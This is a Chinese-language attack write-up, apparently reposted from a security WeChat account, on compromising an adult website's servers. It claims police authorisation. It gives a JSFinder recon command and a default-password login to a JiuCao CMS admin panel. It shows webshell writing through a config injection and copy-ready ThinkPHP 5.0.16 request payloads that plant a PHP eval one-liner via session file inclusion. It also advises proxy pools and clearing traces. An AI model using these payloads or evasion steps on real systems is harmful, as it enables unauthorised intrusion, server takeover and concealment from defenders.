实战 | 记一次某18网站打击

admin 2023年4月3日08:38:18评论99 views字数 1604阅读5分20秒阅读模式

记一次非法网站的打击,本次打击已获公安授权

一眼看去 满满的顶不住哇

实战 | 记一次某18网站打击

首先观察网站信息 经典的「久草cms」 直接开打

参考复现文章

https://www.adminxe.com/2347.html

https://cloud.tencent.com/developer/article/2149425

什么都具备了 但是后台 改了默认路径 哈哈

emm先放一放

实战 | 记一次某18网站打击

再到处点一点 看看接口走向啥的

这里也提一下前端信息收集的小姿势

JS文件中能找到什么?

  • 会增加攻击面(URL、接口、域名)
  • 敏感信息(用户名密码、ak/sk、token/session)
  • 代码中的潜在危险函数(eval、dangerallySetInnerHTML)
  • 具有已知漏洞的框架(JQuery、React)

如何寻找呢

脚本小子

https://github.com/Threezh1/JSFinder
python3 JSFinder.py -u http://www.test.com/

或者Burp History中查找 这个有时候有意想不到的后果

推荐Burp插件 Unexpected.information

然后就是F12了   通过搜索敏感词:pass、accesskey、secret

当然 这个站完全没有 真的假的 这么硬?

上目录扫描  dir一下

另外小伙伴们在打击的时候一定要记得挂代理池

实战 | 记一次某18网站打击

加强字典 找到了个后台地址 /admin-odkazy.php

尝试9ccms 默认口令 密码 成功进入后台

实战 | 记一次某18网站打击

密码修改文件写入 这个cms的源码网上随便找 虽然已经被打烂了 但还是简单审计下

实战 | 记一次某18网站打击

通过页面和配置文件所得

在此输入的都会被写入/JCSQL/Admin/Security/AdminUser.php

例如

实战 | 记一次某18网站打击
实战 | 记一次某18网站打击

闭合写入

实战 | 记一次某18网站打击

写入webshell,保存蚁剑连接即可 但是遗憾的是 该服务器限制了命令执行的函数 尝试绕过无果 无法进行进一步操作

实战 | 记一次某18网站打击

当然这样是不是太简单了?就这 我怎么给同学们当案例讲 不急 我们接着看

上面进行了目录扫描,端口 子域名呢?可不可能还有其他的旁站

尝试  子域名挖掘 挖到了 个旁站  与主站的ip服务器 不相同 有点意思

老规矩 简单的信息收集一波 发现个后台地址 尝试弱口令 这次 运气没那么好 祖传大字典都顶不住了

咋办 就一个后台 其他的信息也没有 在url框任意输入 哦豁 报错了

这熟悉的logo 这熟悉的十年磨一剑 有戏

实战 | 记一次某18网站打击

Thtinkphp 5.0.16  上梭哈工具  无果

手工测试 网上的利用链 打了一遍 但是不知道为什么都没有成功 有点离谱 🤔

仔细观察 页面报错

实战 | 记一次某18网站打击

页面回显参数中还有「Session」「PHPSESSID」

实战 | 记一次某18网站打击

尝试 包含写入

Sessionid包含写入一句话木马

Payload:

_method=__construct&filter[]=thinkSession::set&method=get&get[]=<?php eval($_POST['c'])?>&server[]=1

替换id值,并执行phpinfo查看是否正常写入

_method=__construct&method=get&filter[]=think__include_file&server[]=phpinfo&get[]=/tmp/sess_xxxxxxxxxx&c=phpinfo();

成功回显phpinfo 后面蚁剑连接就好

实战 | 记一次某18网站打击

至此已成功拿到这个小h站的两台服务器权限(第一台有点虚),清理痕迹 交报告

本篇文章中所提到的工具:burp2023.2.4都已经打包啦 公众号后台回复 「0402」 就好啦


关注公众号

下面就是团队的公众号啦,更新的文章都会在第一时间推送在公众号

70篇原创内容



支持作者

实战 | 记一次某18网站打击



另:于传播、利用本公众号CKCsec安全研究院所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,CKCsec安全研究院及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

原文始发于微信公众号(CKCsec安全研究院):实战 | 记一次某18网站打击

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月3日08:38:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战 | 记一次某18网站打击https://cn-sec.com/archives/1648006.html

发表评论

匿名网友 填写信息